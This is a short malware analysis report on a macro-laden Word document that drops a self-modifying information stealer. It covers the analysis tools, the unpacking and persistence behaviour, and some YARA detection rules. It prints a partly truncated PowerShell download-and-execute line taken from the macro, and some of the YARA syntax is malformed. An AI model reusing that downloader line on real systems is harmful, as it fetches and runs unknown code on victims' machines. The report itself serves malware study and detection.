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Malware Analysis Report

1. File info
File name: FILE-025909.doc
MD5: 7beeda071116da212aa8d3ffc4631516
Size: 275,584 Bytes
2. Analysis Environments
Operating System Windows 7- 32bit
Analysis Tool IDA, Immunity Debugger, Olly Dbg,
Exeinfo PE, SysTracer, ProcessExplorer,
VBA Debbuger, OfficeMalScanner
3. Analysis Result
Use OfficemalScanner check specimen and find 3 VB Macro files that is into malware.
After dumping VB Macro, notice they were obfuscate.

Use VBA Debbuger in Office to debug malware. Throughout the process of debugging,
we get a string that is used to run the shell as show bellow.

This shell will run a powershell script:

powershell $Tmz=new-object
b/KmKEymIK'.Split('@');$qtJ = '979';$ITK=$env:public+'\'+$qtJ+'.exe';foreach($Puq
in $qYd){try{$Tmz.DownloadFile($Puq, $ITK);Invoke-Item $ITK;break;}catch{}}
Its purpose is this malware download a excute file with name is 797.exe and run this file.
C&C of document malware:
Analyze Excute file “979.exe”
File info
MD5: 8d79ee8da119c2856f3fbaef9b8fa938
Size: 472,064 Bytes

Use debbuger to debug specimen, I notice it uses the self modify technique to make it
difficult to analyze. Malware decrytp a lot of byte into its, after copy them into memory,
decrypt and modify on memory.

And final, the result is a data segment similar a PE file.

Malware overwrite the above data into malware loaded on memory. The main execute is
into data that is decrypt and write over.
The figure below shows the differences in malware after overwriting executable code in

Let’s analyze code on memory.
Malware create a process with name “979.exe”

The new “979.exe” process check a “bearsfail.exe” file in folder

“C:\Users\username\AppData\Local\Microsoft\Windows”. If this file don’t exist,
malware will create file and copy its into folder.

After copying its, malware create process. This process will create a process with same
name, this behavior is as same as “979.exe” file.

Malware get Computer name, list process running and other data. Data is encode and
encrypt by CryptEncypt API funtion

The next step, malware encode data with base64.

Final, malware connect to C&C servers and send data to them.

C&C servers:

Auto start of malware
Malware creat a key in registry to auto start when system of victim start or restart

4. Yara rule
rule malwareDropper
$mz = "MZ" //Check MZ format
$func_dec = {83 C4 0C BF A2 0F 41 00 8D 6B F1 66 8B 35 F8 85 44 00 83 FB
07 73 01 4B 83 FD 10 73 01 4D 0F B7 C6 85 FF 74 63 3D 90 9B 09 00 75 0C E8 6F 96
01 00 66 8B 35 F8 85 44 00 A1 34 91 45 00 BA 38 00 00 00 8B 08 8D 40 04 81 C1 C0
6A 5F 01 89 48 FC 89 0D 40 91 45 00 4A 75 E9 33 C0 4F 66 85 F6 0F 94 C0 66 A3 D4
85 44 00 8B 44 24 10 83 F8 01 73 05 48 89 44 24 10 81 FF 0C 01 00 00 77 94 6A 29}
$data_en = {01 F3 F5 C6 2C 5E 85 70 80 32 9D CA 0D 76 CE 2E 94 AB 27 AC
39 89 A6 6F 80 BB 97 A1 5B BC 6B 00 03 19 A1 E4 8A BB 98 D6 81 0C 5F 3A 83 BB 74
A0 90 72 5E 3A 88 14 84 59 39 37 9D 6F 6B B9 E9 D8 30 F9 49 B5 02 FC 07 01 BC 3F
F8 F3 CD A1 B3 50 B4 D5 DE 07 FA C3 AE 15 17 DF 9B C6 C3 74 06 FD C1 36 38 A1
AA 7B 52 98 A5 3A C2 1E 8C B6 26 F3 A3 84 3F 72 18 25 4A F0 C0 C3 C7 6F AF 44
A7 6F C5 B4 9F 0F 12 23 D3 77 CB D5 AB 91 FD F5 55 98}
$gen_ip = {E8 C9 B7 FF FF 83 C4 04 85 C0 0F 84 FD 00 00 00 68 FA 8F C0 1D

BA 54 00 00 00 B9 40 05 41 00 E8 BA B0 FF FF 8B 4F 14 83 C4 04 8B F0 0F B6 01 50
0F B6 41 01 50 0F B6 41 02 50 0F B6 41 03 50 56 8D 85 50 FF FF FF 6A 40 50 FF 15
6C 35 41 00 83 C4 1C 8B CE E8 25 B1 FF FF 8B 4D FC B8 AB AA AA AA}
$mz at 0 and (f$unc_dec or $data_en or $gen_ip)
rule malwareOffice
$header = {D0 CF 11 E0 A1 B1 1A E1} //Check header office 2003
$shell_execute = {53 68 65 6C 6C [-]6D 73 6F 42 61 72 54 79 70 65 4E 6F 72 6D
61 6C
$header at 0 and $shell_execute

5. Conclusion
This malware is a downloader and obfuscate. Dropper malware steals information after
infecting the victim’s computer. It self modify on memory to makes it difficult for an
analyst. It decrypt a piece of data and then overwrite its own executable code in memory,
after executing main code.

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